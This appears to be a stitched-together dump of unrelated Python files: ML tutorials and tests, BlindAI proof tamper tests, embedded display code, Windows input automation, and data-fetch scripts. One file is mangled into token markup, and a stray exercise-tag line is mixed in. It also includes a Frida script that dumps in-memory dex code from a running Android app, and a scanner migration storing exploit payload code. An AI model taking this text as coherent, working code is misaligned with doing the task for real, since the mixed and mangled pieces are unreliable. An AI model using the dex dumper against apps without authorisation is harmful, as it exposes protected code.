migrations.AddField(model_name="devicebay" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) ]<block_end>
from copy import deepcopy
from hashlib import sha256
import os
import unittest

from google.protobuf.timestamp_pb2 import Timestamp

from blindai.pb.securedexchange_pb2 import Payload
from blindai.client import RunModelResponse, UploadModelResponse
from blindai.dcap_attestation import Policy
from blindai.utils.errors import SignatureError, AttestationError

from .covidnet import get_input, get_model

# Recorded proofs and policy fixtures, resolved next to this test module.
exec_run = os.path.join(os.path.dirname(__file__), "exec_run.proof")
exec_upload = os.path.join(os.path.dirname(__file__), "exec_upload.proof")
tmp_path = os.path.join(os.path.dirname(__file__), "tmp_exec.proof")
policy_file = os.path.join(os.path.dirname(__file__), "policy.toml")


class TestProof(unittest.TestCase):
    """Round-trip (parse) and tamper-detection (validate) tests for proofs."""

    def test_parse_run(self):
        """A RunModelResponse survives file and byte round trips unchanged."""
        original = RunModelResponse()
        original.load_from_file(exec_run)
        self.assertTrue(original.is_signed())

        # Load the same proof from raw bytes.
        from_bytes = RunModelResponse()
        with open(exec_run, "rb") as fh:
            from_bytes.load_from_bytes(fh.read())
        self.assertEqual(original.payload, from_bytes.payload)
        self.assertEqual(original.signature, from_bytes.signature)
        self.assertEqual(original.attestation, from_bytes.attestation)
        self.assertEqual(original.output, from_bytes.output)

        # Re-serialize to bytes and parse again.
        reserialized = RunModelResponse()
        reserialized.load_from_bytes(original.as_bytes())
        self.assertEqual(original.payload, reserialized.payload)
        self.assertEqual(original.signature, reserialized.signature)
        self.assertEqual(original.attestation, reserialized.attestation)
        self.assertEqual(original.output, reserialized.output)

        # Save to a temporary file and reload.
        reserialized.save_to_file(tmp_path)
        reloaded = RunModelResponse()
        reloaded.load_from_file(tmp_path)
        self.assertEqual(original.payload, reloaded.payload)
        self.assertEqual(original.signature, reloaded.signature)
        self.assertEqual(original.attestation, reloaded.attestation)
        self.assertEqual(original.output, reloaded.output)

    def test_parse_upload(self):
        """An UploadModelResponse survives file and byte round trips unchanged."""
        original = UploadModelResponse()
        original.load_from_file(exec_upload)
        self.assertTrue(original.is_signed())

        from_bytes = UploadModelResponse()
        with open(exec_upload, "rb") as fh:
            from_bytes.load_from_bytes(fh.read())
        self.assertEqual(original.payload, from_bytes.payload)
        self.assertEqual(original.signature, from_bytes.signature)
        self.assertEqual(original.attestation, from_bytes.attestation)

        reserialized = UploadModelResponse()
        reserialized.load_from_bytes(original.as_bytes())
        self.assertEqual(original.payload, reserialized.payload)
        self.assertEqual(original.signature, reserialized.signature)
        self.assertEqual(original.attestation, reserialized.attestation)

        reserialized.save_to_file(tmp_path)
        reloaded = UploadModelResponse()
        reloaded.load_from_file(tmp_path)
        self.assertEqual(original.payload, reloaded.payload)
        self.assertEqual(original.signature, reloaded.signature)
        self.assertEqual(original.attestation, reloaded.attestation)

    def test_validate_run(self):
        """Validation accepts the genuine proof and rejects any tampering."""
        response = RunModelResponse()
        response.load_from_file(exec_run)
        policy = Policy.from_file(policy_file)
        response.validate(
            get_input(),
            policy=policy,
        )

        # Stripping the signature must fail validation.
        tampered = deepcopy(response)
        tampered.signature = None
        tampered.attestation = None
        with self.assertRaises(SignatureError):
            tampered.validate(
                get_input(),
                policy=policy,
            )

        # Corrupting the attestation quote must fail.
        tampered = deepcopy(response)
        tampered.attestation.quote += b"a"
        with self.assertRaises(AttestationError):
            tampered.validate(
                get_input(),
                policy=policy,
            )

        # Corrupting the enclave-held data must fail.
        tampered = deepcopy(response)
        tampered.attestation.enclave_held_data += b"a"
        with self.assertRaises(AttestationError):
            tampered.validate(
                get_input(),
                policy=policy,
            )

        # Tampering with the payload breaks the signature.
        tampered = deepcopy(response)
        payload = Payload.FromString(tampered.payload)
        payload.run_model_payload.output[0] += 0.1
        tampered.payload = payload.SerializeToString()
        with self.assertRaises(SignatureError):
            tampered.validate(
                get_input(),
                policy=policy,
            )

        # A different input must not validate against the recorded proof.
        tampered = deepcopy(response)
        data = deepcopy(get_input())
        data[4] += 1
        with self.assertRaises(SignatureError):
            tampered.validate(
                data,
                policy=policy,
            )

        # Validation also accepts a policy file path directly.
        response.validate(
            get_input(),
            policy_file=policy_file,
        )

    def test_validate_upload(self):
        """Upload-proof validation accepts the genuine model hash only."""
        response = UploadModelResponse()
        response.load_from_file(exec_upload)
        policy = Policy.from_file(policy_file)
        model_hash = sha256(get_model()).digest()
        response.validate(
            model_hash,
            policy=policy,
        )

        # Stripping the signature must fail validation.
        tampered = deepcopy(response)
        tampered.signature = None
        tampered.attestation = None
        with self.assertRaises(SignatureError):
            tampered.validate(
                model_hash,
                policy=policy,
            )

        # Corrupting the attestation quote must fail.
        tampered = deepcopy(response)
        tampered.attestation.quote += b"a"
        with self.assertRaises(AttestationError):
            tampered.validate(
                model_hash,
                policy=policy,
            )

        # Corrupting the enclave-held data must fail.
        tampered = deepcopy(response)
        tampered.attestation.enclave_held_data += b"a"
        with self.assertRaises(AttestationError):
            tampered.validate(
                model_hash,
                policy=policy,
            )

        # Tampering with the hash stored in the payload breaks the signature.
        tampered = deepcopy(response)
        payload = Payload.FromString(tampered.payload)
        payload.send_model_payload.model_hash = (
            b"1" + payload.send_model_payload.model_hash[1:])
        tampered.payload = payload.SerializeToString()
        with self.assertRaises(SignatureError):
            tampered.validate(
                model_hash,
                policy=policy,
            )

        # A different model hash must not validate.
        tampered = deepcopy(response)
        new_hash = model_hash[:5] + b"1" + model_hash[6:]
        with self.assertRaises(SignatureError):
            tampered.validate(
                new_hash,
                policy=policy,
            )

        # Validation also accepts a policy file path directly.
        response.validate(
            model_hash,
            policy_file=policy_file,
        )
##$$## ---------- TAGS ----------- ##$$## ##$$## first,non,repeated,character ##$$## --------- ENDTAGS --------- ##$$## ###### - Write your answer below - ######
"""
======================================================
From ResNets to Momentum ResNets 1)
======================================================
This is a tutorial to use the transform_to_momentumnet method:

<NAME>, <NAME>, <NAME>, <NAME>.
Momentum Residual Neural Networks.
Proceedings of the 38th International Conference on Machine Learning, PMLR 139:9276-9287
"""  # noqa

# Authors: <NAME>, <NAME>
# License: MIT

from torch import nn

from momentumnet import transform_to_momentumnet

####################################
# Let us define a toy Neural Network
####################################


class ResBlock(nn.Module):
    """Residual wrapper: iteratively applies x <- x + f(x) for each f."""

    def __init__(self, functions):
        super(ResBlock, self).__init__()
        self.functions = functions

    def forward(self, x):
        for residual_fn in self.functions:
            x = x + residual_fn(x)
        return x


class Net(nn.Module):
    """Toy MLP mixing a residual stage and a plain dimension-preserving stage."""

    def __init__(self):
        super(Net, self).__init__()
        self.res_layer1 = ResBlock(nn.Sequential(*[
            nn.Sequential(nn.Linear(2, 10), nn.Tanh(), nn.Linear(10, 2))
            for _ in range(3)
        ]))
        self.l1 = nn.Linear(2, 4)
        self.layer2 = nn.Sequential(*[
            nn.Sequential(nn.Linear(4, 100), nn.ReLU(), nn.Linear(100, 4))
            for _ in range(4)
        ])
        self.l2 = nn.Linear(4, 8)
        self.fc = nn.Linear(8, 10)

    def forward(self, x):
        out = self.res_layer1(x)  # residual stage
        out = self.l1(out)
        out = self.layer2(out)  # not residual, but preserves dimensions
        out = self.l2(out)
        return self.fc(out)


net = Net()

###################################################
# We want to transform it into its Momentum version
###################################################

###############################################################################
# The first layer 'res_layer1' preserves dimension and is residual.
# It can be accessed through net.res_layer_1.functions so we will specify
# this attribute as the "sub_layers" parameter.
# One can transform this residual block into a momentum one as follow:

mnet1 = transform_to_momentumnet(
    net,
    ["res_layer1.functions"],  # attributes of the sublayers in net
    gamma=0.9,
    use_backprop=False,
    is_residual=True,
    keep_first_layer=False,
)

###############################################################################
# Note that layer2 is not residual but also preserves dimensions.
# It can be accessed through net.layer_2 so we will specify
# this attribute as the "sub_layers" parameter.
# One can transform it in the same way setting is_residual to False.

mnet = transform_to_momentumnet(
    mnet1,
    ["layer2"],
    gamma=0.9,
    use_backprop=False,
    is_residual=False,
    keep_first_layer=False,
)

###############################################################################
# net, mnet1, and mnet have the same parameters.
""" Largely based on the OpenAI Gym Implementation https://github.com/openai/gym/blob/master/gym/envs/classic_control/cartpole.py """<import_from_future_stmt> division generators print_function<import_stmt>numpy<as>np<import_stmt>macarico<import_stmt>math<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<import_from_stmt>torch.autograd Variable<as>Var<class_stmt>CartPoleEnv(macarico.Env)<block_start><def_stmt>__init__ self<block_start>macarico.Env.__init__(self 2 200)<line_sep>self.gravity=9.8<line_sep>self.masscart=1.0<line_sep>self.masspole=0.1<line_sep>self.total_mass=(self.masspole+self.masscart)<line_sep>self.length=0.5# actually half the pole's length self.polemass_length=(self.masspole<times>self.length)<line_sep>self.force_mag=10.0<line_sep>self.tau=0.02# seconds between state updates # Angle at which to fail the episode self.theta_threshold_radians=12<times>2<times>math.pi/360<line_sep>self.x_threshold=2.4<line_sep># Angle limit set to 2 * theta_threshold_radians so failing observation # is still within bounds self.state=<none><line_sep># For macarico.Env self.actions=set(range(self.n_actions))<block_end><def_stmt>_rewind self<block_start>self.state=torch.rand(4)<times>0.1-0.05<line_sep>self.steps_beyond_done=<none><block_end><def_stmt>_run_episode self policy<block_start><for_stmt>_ range(self.horizon())<block_start>a=policy(self)<if_stmt>self.step(a)<block_start><break><block_end><block_end><return>self._trajectory<block_end><def_stmt>step self 
action<block_start>state=self.state<line_sep>x,x_dot,theta,theta_dot=state<line_sep>force=self.force_mag<if>action<eq>1<else>-self.force_mag<line_sep>costheta=math.cos(theta)<line_sep>sintheta=math.sin(theta)<line_sep>temp=(force+self.polemass_length<times>theta_dot<times>theta_dot<times>sintheta)/self.total_mass<line_sep>thetaacc=(self.gravity<times>sintheta-costheta<times>temp)/(self.length<times>(4.0/3.0-self.masspole<times>costheta<times>costheta/self.total_mass))<line_sep>xacc=temp-self.polemass_length<times>thetaacc<times>costheta/self.total_mass<line_sep>x=x+self.tau<times>x_dot<line_sep>x_dot=x_dot+self.tau<times>xacc<line_sep>theta=theta+self.tau<times>theta_dot<line_sep>theta_dot=theta_dot+self.tau<times>thetaacc<line_sep>#self.state = (x, x_dot, theta, theta_dot) self.state[0]=x<line_sep>self.state[1]=x_dot<line_sep>self.state[2]=theta<line_sep>self.state[3]=theta_dot<line_sep>done=x<l>-self.x_threshold<or>x<g>self.x_threshold<or>theta<l>-self.theta_threshold_radians<or>theta<g>self.theta_threshold_radians<line_sep><return>done<block_end><block_end><class_stmt>CartPoleLoss(macarico.Loss)<block_start><def_stmt>__init__ self<block_start>super(CartPoleLoss self).__init__('-t')<block_end><def_stmt>evaluate self example<block_start><return>-len(example.Yhat)<line_sep>#return (100 - state.t) / 100 <block_end><block_end><class_stmt>CartPoleFeatures(macarico.DynamicFeatures)<block_start><def_stmt>__init__ self<block_start>macarico.DynamicFeatures.__init__(self 4)<block_end><def_stmt>_forward self state<block_start><return>Var(state.state.view(1 1 -1) requires_grad=<false>)<block_end><block_end>
import pytest
import numpy as np

torch = pytest.importorskip('torch')

from baseline.utils import Offsets
from baseline.pytorch.torchy import SequenceCriterion

# Vocabulary size, batch size, and max sequence length for the fixtures.
C = 10
B = 50
S = 20


@pytest.fixture
def lengths():
    """Random valid lengths in [1, S) for each sequence in the batch."""
    return torch.randint(1, S, size=(B,)).long()


@pytest.fixture
def logits(lengths):
    """Random logits, zeroed past each sequence's length."""
    scores = torch.rand(B, S, C)
    for row, valid in enumerate(lengths):
        scores[row, valid:, :] = 0
    return scores


@pytest.fixture
def labels(lengths):
    """Random non-pad labels, padded with 0 past each sequence's length."""
    lab = torch.randint(1, C, size=(B, S)).long()
    for row, valid in enumerate(lengths):
        lab[row, valid:] = 0
    return lab


def raw_loss(logits, labels, loss):
    """Per-token unreduced loss, reshaped back to (batch, time)."""
    batch, time_steps, _ = logits.size()
    crit = loss(reduce=False, ignore_index=Offsets.PAD)
    flat = labels.nelement()
    per_token = crit(logits.view(flat, -1), labels.view(flat))
    return per_token.view(batch, time_steps)


def test_batch_sequence_loss(logits, labels):
    """avg='batch' means: sum over time, then mean over the batch."""
    loss = torch.nn.CrossEntropyLoss
    per_token = raw_loss(logits, labels, loss)
    gold = torch.mean(torch.sum(per_token, dim=1))
    crit = SequenceCriterion(LossFn=loss, avg='batch')
    res = crit(logits, labels)
    np.testing.assert_allclose(res.numpy(), gold.numpy(), rtol=1e-6)


def test_token_sequence_loss(logits, labels, lengths):
    """avg='token' means: total loss divided by the number of real tokens."""
    loss = torch.nn.CrossEntropyLoss
    per_token = raw_loss(logits, labels, loss)
    gold = torch.sum(per_token) / torch.sum(lengths).to(logits.dtype)
    crit = SequenceCriterion(LossFn=loss, avg='token')
    res = crit(logits, labels)
    np.testing.assert_allclose(res.numpy(), gold.numpy(), rtol=1e-6)
import lvgl as lv
import lvgl_helper as lv_h
import lcd
import time
from machine import Timer
from machine import I2C
import touchscreen as ts

# Bring up the hardware: I2C bus for the touch panel, LCD, then LVGL.
i2c = I2C(I2C.I2C0, freq=400000, scl=30, sda=31)
lcd.init()
ts.init(i2c)
lv.init()

# Single 10-line draw buffer for the 320x240 display.
disp_buf1 = lv.disp_buf_t()
buf1_1 = bytearray(320 * 10)
lv.disp_buf_init(disp_buf1, buf1_1, None, len(buf1_1) // 4)

# Display driver.
disp_drv = lv.disp_drv_t()
lv.disp_drv_init(disp_drv)
disp_drv.buffer = disp_buf1
disp_drv.flush_cb = lv_h.flush
disp_drv.hor_res = 320
disp_drv.ver_res = 240
lv.disp_drv_register(disp_drv)

# Pointer-type input device backed by the touchscreen.
indev_drv = lv.indev_drv_t()
lv.indev_drv_init(indev_drv)
indev_drv.type = lv.INDEV_TYPE.POINTER
indev_drv.read_cb = lv_h.read
lv.indev_drv_register(indev_drv)

# Route LVGL log lines to the REPL.
lv.log_register_print_cb(
    lambda level, path, line, msg: print('%s(%d): %s' % (path, line, msg)))

# Image data
with open('/flash/blue_flower_32.bin', 'rb') as f:
    img_data = f.read()

# Pixel format: Fix 0xFF: 8 bit, Red: 8 bit, Green: 8 bit, Blue: 8 bit
scr = lv.obj()
img = lv.img(scr)
img.align(scr, lv.ALIGN.CENTER, 0, 0)
img_dsc = lv.img_dsc_t({
    'header': {'always_zero': 0, 'w': 100, 'h': 75, 'cf': lv.img.CF.TRUE_COLOR},
    'data_size': len(img_data),
    'data': img_data,
})
img.set_src(img_dsc)
img.set_drag(False)

# Load the screen and display image
lv.scr_load(scr)


def on_timer(timer):
    # Advance LVGL's internal clock by the 5 ms timer period.
    lv.tick_inc(5)


timer = Timer(Timer.TIMER0, Timer.CHANNEL0, mode=Timer.MODE_PERIODIC,
              period=5, unit=Timer.UNIT_MS, callback=on_timer, arg=None)

# Main loop: run LVGL tasks once per ~5 ms frame.
while True:
    frame_start = time.ticks_ms()
    lv.task_handler()
    while time.ticks_ms() - frame_start < 5:
        pass
import json
import os
import sys
import frida
import time
import re

# Dump in-memory dex files from a running Android app via a frida agent.
# Usage: dumpdex.py <pid|packageName>

if len(sys.argv) <= 1:
    print("[Dumpdex]: you should pass pid/packageName")
    exit()

device = frida.get_usb_device()
# Default to whatever app is currently in the foreground.
pkg_name = device.get_frontmost_application().identifier

# A purely numeric argument is treated as a pid, anything else as a package
# name. (The original guarded on "'app_pid' in locals()" immediately after
# assigning app_pid — that condition was always true, so it is dropped.)
if re.match(r'^\d+$', sys.argv[1]):
    app_pid = sys.argv[1]
    print("[Dumpdex]: you specified the pid:" + app_pid)
    # Attaching by pid supports apps that run multiple processes.
    session = device.attach(int(app_pid))
else:
    pkg_name = sys.argv[1]
    print("[Dumpdex]: you specified the package name:" + pkg_name
          + ", so spawn it and sleep 50s for launch completely")
    pid = device.spawn(pkg_name)
    time.sleep(50)  # give the app time to load its dex files
    session = device.attach(pid)

# The agent script lives under the root dir recorded by xadb.
with open(os.path.expanduser("~/.xadb/rootdir")) as cfg:
    root_dir = cfg.read().strip()
with open(root_dir + "/script/agent.js") as agent_src:
    script = session.create_script(agent_src.read())
script.load()

matches = script.exports.scandex()
# Create the output directory once, not per dex file.
if not os.path.exists("./" + pkg_name + "/"):
    os.mkdir("./" + pkg_name + "/")
for dex in matches:
    dex_bytes = script.exports.memorydump(dex['addr'], dex['size'])
    # Context manager ensures the dump file is flushed and closed.
    with open(pkg_name + "/" + dex['addr'] + ".dex", 'wb') as out:
        out.write(dex_bytes)
    print("[Dumpdex]: DexSize=" + hex(dex['size'])
          + ", SavePath=./" + pkg_name + "/" + dex['addr'] + ".dex")
import FWCore.ParameterSet.Config as cms

from RecoPixelVertexing.PixelLowPtUtilities.StripSubClusterShapeFilter_cfi import StripSubClusterShapeFilterParams

# Seed-stage flavour of the strip sub-cluster shape filter: shares the common
# filter parameters and runs before the helix stage.
StripSubClusterShapeSeedFilter = cms.PSet(
    StripSubClusterShapeFilterParams,
    ComponentName=cms.string('StripSubClusterShapeSeedFilter'),
    FilterAtHelixStage=cms.bool(False),
    label=cms.untracked.string("Seeds"),
)
import numpy

from chainer import functions
from chainer import testing


@testing.parameterize(*(testing.product({
    'batchsize': [1, 5],
    'size': [10, 20],
    'dtype': [numpy.float32],
    'eps': [1e-5, 1e-1],
})))
@testing.inject_backend_tests(
    None,
    # CPU tests
    [{}]
    # GPU tests
    + testing.product({
        'use_cuda': [True],
        'use_cudnn': ['never', 'always'],
        'cuda_device': [0, 1],
    })
    # ChainerX tests
    + [
        {'use_chainerx': True, 'chainerx_device': 'native:0'},
        {'use_chainerx': True, 'chainerx_device': 'cuda:0'},
        {'use_chainerx': True, 'chainerx_device': 'cuda:1'},
    ])
class TestLayerNormalization(testing.FunctionTestCase):
    """Checks functions.layer_normalization against a NumPy reference."""

    def setUp(self):
        self.check_forward_options = {'atol': 1e-4, 'rtol': 1e-3}
        self.check_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
        self.check_double_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
        # Looser tolerances for half precision.
        if self.dtype == numpy.float16:
            self.check_forward_options = {'atol': 1e-3, 'rtol': 1e-2}
            self.check_backward_options = {'atol': 1e-3, 'rtol': 1e-2}
            self.check_double_backward_options = {'atol': 1e-3, 'rtol': 1e-2}

    def generate_inputs(self):
        """Random input plus per-feature scale (gamma) and shift (beta)."""
        shape = self.batchsize, self.size
        size = numpy.prod(shape) // shape[0]
        x = numpy.random.uniform(-1, 1, shape).astype(self.dtype)
        gamma = numpy.random.uniform(-1, 1, size).astype(self.dtype)
        beta = numpy.random.uniform(-1, 1, size).astype(self.dtype)
        return x, gamma, beta

    def forward_expected(self, inputs):
        """NumPy reference: normalize over axis 1, then scale and shift."""
        x, gamma, beta = inputs
        mean = numpy.mean(x, axis=1, keepdims=True)
        var = numpy.mean(numpy.square(x - mean), axis=1, keepdims=True)
        std = numpy.sqrt(var + self.eps)
        y_expected = (
            numpy.expand_dims(gamma, axis=0) * (x - mean) / std
            + numpy.expand_dims(beta, axis=0))
        return y_expected,

    def forward(self, inputs, device):
        x, gamma, beta = inputs
        y = functions.layer_normalization(x, gamma, beta, eps=self.eps)
        return y,


testing.run_module(__name__, __file__)
# Copyright 2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random

import numpy as np
import pytest

import cunumeric as cn
from legate.core import LEGATE_MAX_DIM


@pytest.mark.parametrize("ndim", range(0, LEGATE_MAX_DIM))
def test_indices(ndim):
    """cunumeric.indices agrees with numpy.indices on random shapes."""
    dimensions = tuple(random.randint(2, 5) for i in range(ndim))

    # Default integer dtype.
    np_res = np.indices(dimensions)
    cn_res = cn.indices(dimensions)
    assert np.array_equal(np_res, cn_res)

    # Explicit float dtype.
    np_res = np.indices(dimensions, dtype=float)
    cn_res = cn.indices(dimensions, dtype=float)
    assert np.array_equal(np_res, cn_res)

    # Sparse output: compare each per-axis grid.
    np_res = np.indices(dimensions, sparse=True)
    cn_res = cn.indices(dimensions, sparse=True)
    for axis in range(len(np_res)):
        assert np.array_equal(np_res[axis], cn_res[axis])


if __name__ == "__main__":
    import sys

    sys.exit(pytest.main(sys.argv))
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.

This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.

Copyright (C) 2020 THL A29 Limited, a Tencent company.  All rights reserved.
"""

import time
import traceback
import logging

import win32gui

from ..iPcDeviceAPI import IPcDeviceAPI
from .APIDefine import LOG_DEFAULT
from .win32driver.capture import get_image, roi
from .win32driver.keyboard import Keyboard
from .win32driver.mouse import Mouse, MouseClickType, MouseFlag
from .win32driver.probe import Win32Probe, set_foreground_window
from .win32driver.by import QPath


class WindowsDeviceAPI(IPcDeviceAPI):
    """Win32 implementation of the PC device API: screen capture plus
    keyboard/mouse input injection against a target window."""

    def __init__(self, platform):
        IPcDeviceAPI.__init__(self, platform)
        self.__logger = logging.getLogger(LOG_DEFAULT)
        self._is_desktop_window = False
        self._hwnd = None
        self._qpath = None
        self._windows_size = None
        self._kwargs = {}

    def Initialize(self, **kwargs):
        """Locate and validate the target window.

        Keyword args: ``hwnd`` (int or digit string), ``query_path``
        (QPath query string), ``window_size`` ((w, h) sanity check with a
        50-pixel tolerance). Falls back to the desktop window when neither
        hwnd nor query_path is supplied.
        """
        hwnd = kwargs.get('hwnd', None)
        query_path = kwargs.get('query_path', None)
        window_size = kwargs.get('window_size', None)

        if not hwnd and query_path is None:
            hwnd = win32gui.GetDesktopWindow()
            self._is_desktop_window = True
        if not hwnd and query_path:
            # Resolve the window through the probe; the query must match
            # exactly one window.
            candidates = Win32Probe().search_element(QPath(query_path))
            if len(candidates) > 1:
                raise Exception('found multi windows by qpath(%s)' % query_path)
            elif len(candidates) == 0:
                raise Exception('failed to find window by qpath(%s)' % query_path)
            hwnd = candidates[0]

        if isinstance(hwnd, str) and hwnd.isdigit():
            hwnd = int(hwnd)
        if not win32gui.IsWindow(hwnd):
            raise ValueError('hwnd(%s) is not valid' % hwnd)

        if window_size:
            left, top, right, bottom = win32gui.GetWindowRect(hwnd)
            w = right - left
            h = bottom - top
            if abs(w - window_size[0]) > 50 or abs(h - window_size[1]) > 50:
                raise Exception('window size is not equal, real(%s) != %s'
                                % (str([w, h]), str(window_size)))

        # Bring the owning top-level window to the foreground, if any.
        top_hwnd = Win32Probe().get_property(hwnd, 'TOPLEVELWINDOW')
        if top_hwnd:
            set_foreground_window(top_hwnd)

        self._hwnd = hwnd
        self._qpath = query_path
        self._kwargs = kwargs
        self._windows_size = window_size
        return True

    @property
    def window_handle(self):
        """The resolved Win32 window handle (None before Initialize)."""
        return self._hwnd

    def DeInitialize(self):
        return True

    def ScreenCap(self, subrect=None):
        """Capture the target window; optionally crop to ``subrect``."""
        try:
            image = get_image(self._hwnd)
            if image is not None and subrect:
                image = roi(image, subrect)
            return image
        except Exception as err:
            self.__logger.error('screencap error: %s', err)
            raise err

    def _to_screen_pos(self, client_pos):
        """Convert window-relative coordinates to absolute screen coordinates."""
        if self._is_desktop_window:
            return client_pos
        x, y = client_pos
        rect = win32gui.GetWindowRect(self._hwnd)
        return (x + rect[0], y + rect[1])

    def PressKey(self, key):
        Keyboard.press_key(key)

    def ReleaseKey(self, key):
        Keyboard.release_key(key)

    def InputKeys(self, keys, long_click_time):
        Keyboard.input_keys(keys)
        if long_click_time > 0:
            time.sleep(long_click_time / 1000)

    def InputStrings(self, key_string):
        Keyboard.input_keys(key_string)

    def MouseMove(self, px, py):
        sx, sy = self._to_screen_pos((px, py))
        Mouse.move(sx, sy)

    def MouseClick(self, px, py, by_post=False):
        # post_click delivers messages to the window directly instead of
        # moving the real cursor.
        if by_post:
            Mouse.post_click(self._hwnd, px, py)
        else:
            sx, sy = self._to_screen_pos((px, py))
            Mouse.click(sx, sy)

    def MouseDoubleClick(self, px, py):
        sx, sy = self._to_screen_pos((px, py))
        Mouse.click(sx, sy, click_type=MouseClickType.DoubleClick)

    def MouseRightClick(self, px, py):
        sx, sy = self._to_screen_pos((px, py))
        Mouse.click(sx, sy, MouseFlag.RightButton)

    def MouseLongClick(self, px, py, long_click_time):
        """Click at (px, py) and hold for ``long_click_time`` milliseconds."""
        sx, sy = self._to_screen_pos((px, py))
        Mouse.click(sx, sy)
        time.sleep(long_click_time / 1000)

    def MouseDrag(self, from_x, from_y, to_x, to_y):
        """Drag from (from_x, from_y) to (to_x, to_y), window coordinates."""
        sfx, sfy = self._to_screen_pos((from_x, from_y))
        stx, sty = self._to_screen_pos((to_x, to_y))
        Mouse.drag(sfx, sfy, stx, sty)
"""
An app script to run registration between two cameras from the command line.

Copyright (C) Microsoft Corporation.  All rights reserved.
"""

# Standard Libraries.
import argparse

# Calibration tools.
from camera_tools import register

# ------------------------------------------------------------------------------


def parse_args():
    """Build and parse the command-line arguments for registration.

    Returns:
        argparse.Namespace with img_a, img_b, template, calib_a, calib_b,
        out_dir attributes.
    """
    parser = argparse.ArgumentParser(description="Get extrinsics for cameras.")
    parser.add_argument("-ia", "--img-a", required=True,
                        help="Full path to image from camera A.")
    parser.add_argument("-ib", "--img-b", required=True,
                        help="Full path to image from camera B.")
    parser.add_argument("-t", "--template", required=True,
                        help="Full path to Charuco board template file.")
    parser.add_argument("-ca", "--calib-a", required=True,
                        help="Full path to calibration file from camera A.")
    parser.add_argument("-cb", "--calib-b", required=True,
                        help="Full path to calibration file from camera B.")
    parser.add_argument("-o", "--out-dir", required=True,
                        help="Output directory for full calibration blob.")
    return parser.parse_args()


if __name__ == "__main__":
    args = parse_args()
    # register returns the relative pose plus per-camera reprojection errors.
    (rotation, translation,
     rms1_pixels, rms1_rad,
     rms2_pixels, rms2_rad) = register(args.img_a, args.img_b, args.template,
                                       args.calib_a, args.calib_b,
                                       args.out_dir)
# Generated by Django 4.0.1 on 2022-03-10 17:36

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    """Replaces exploitregister.file_object with inline code/debug fields
    and links each exploit to a debug target asset."""

    dependencies = [
        ('Assets', '0003_alter_assetlist_timestamp_alter_assettask_timestamp'),
        ('VulnerableScan', '0003_alter_exploitregister_timestamp_and_more'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='exploitregister',
            name='file_object',
        ),
        migrations.AddField(
            model_name='exploitregister',
            name='code',
            field=models.TextField(db_column='code', null=True,
                                   verbose_name='负载代码'),
        ),
        migrations.AddField(
            model_name='exploitregister',
            name='debug_info',
            field=models.TextField(blank=True, db_column='debug_info',
                                   default='', null=True,
                                   verbose_name='调试信息'),
        ),
        migrations.AddField(
            model_name='exploitregister',
            name='function_name',
            field=models.CharField(db_column='function_name', default='',
                                   max_length=100, verbose_name='函数名称'),
        ),
        migrations.AddField(
            model_name='exploitregister',
            name='target',
            field=models.ForeignKey(blank=True, null=True,
                                    on_delete=django.db.models.deletion.CASCADE,
                                    to='Assets.assetlist',
                                    verbose_name='调试目标'),
        ),
        migrations.AlterField(
            model_name='exploitregister',
            name='description',
            field=models.TextField(db_column='description',
                                   verbose_name='负载描述'),
        ),
    ]
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np


def run(raven, inputs):
  """
    Run method.
    Reads scalars a, b, c from the RAVEN object and writes outputs with
    mixed dimensionality: d (scalar), e (indexed by x), f (indexed by x, y).
    @ In, raven, object, RAVEN object
    @ In, inputs, dict, input dictionary
    @ Out, None
  """
  nx = 5
  ny = 3
  # Index coordinates for the vector/matrix outputs.
  x = np.arange(nx) * 0.1
  y = np.arange(ny) * 10
  raven.x = x
  raven.y = y
  # Outputs: scalar, 1-D over x, 2-D over (x, y).
  raven.d = raven.a * raven.a
  raven.e = x * raven.b
  raven.f = np.arange(nx * ny).reshape(nx, ny) * raven.c
  # Tell RAVEN which index variables each output depends on.
  raven._indexMap = {'e': ['x'], 'f': ['x', 'y']}
import argparse
import os

from common import directories
from common.fetch_arxiv import fetch_from_arxiv
from common.unpack import unpack, unpack_archive

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        "Fetch and unpack sources for a single arXiv paper.")
    parser.add_argument(
        "arxiv_id",
        help="The arXiv ID for a paper. May include version number (i.e., 'v1', 'v2', etc.)",
    )
    parser.add_argument(
        "--output-dir",
        help=(
            "Directory into which the arXiv sources will be fetched. The fetched sources will "
            + "be saved in a subfolder of the output folder with its name as the arXiv ID "
            + "(i.e., 'output_dir/<arxiv_id>/')."
        ),
        default="tmp",
    )
    args = parser.parse_args()
    arxiv_id = args.arxiv_id
    output_dir = args.output_dir

    # Slashes in versioned IDs are escaped so they can be used as file names.
    archives_dir = os.path.join(output_dir, "archives")
    archive_path = os.path.join(archives_dir,
                                directories.escape_slashes(arxiv_id))
    sources_dir = os.path.join(output_dir,
                               directories.escape_slashes(arxiv_id))

    if not os.path.exists(archives_dir):
        print(f"Creating directory to hold source archives at {archives_dir}.")
        os.makedirs(archives_dir)

    print(
        f"Downloading archive of source files from arXiv for paper {arxiv_id}...",
        end="",
    )
    fetch_from_arxiv(arxiv_id, dest=archive_path)
    print("done.")

    if not os.path.exists(sources_dir):
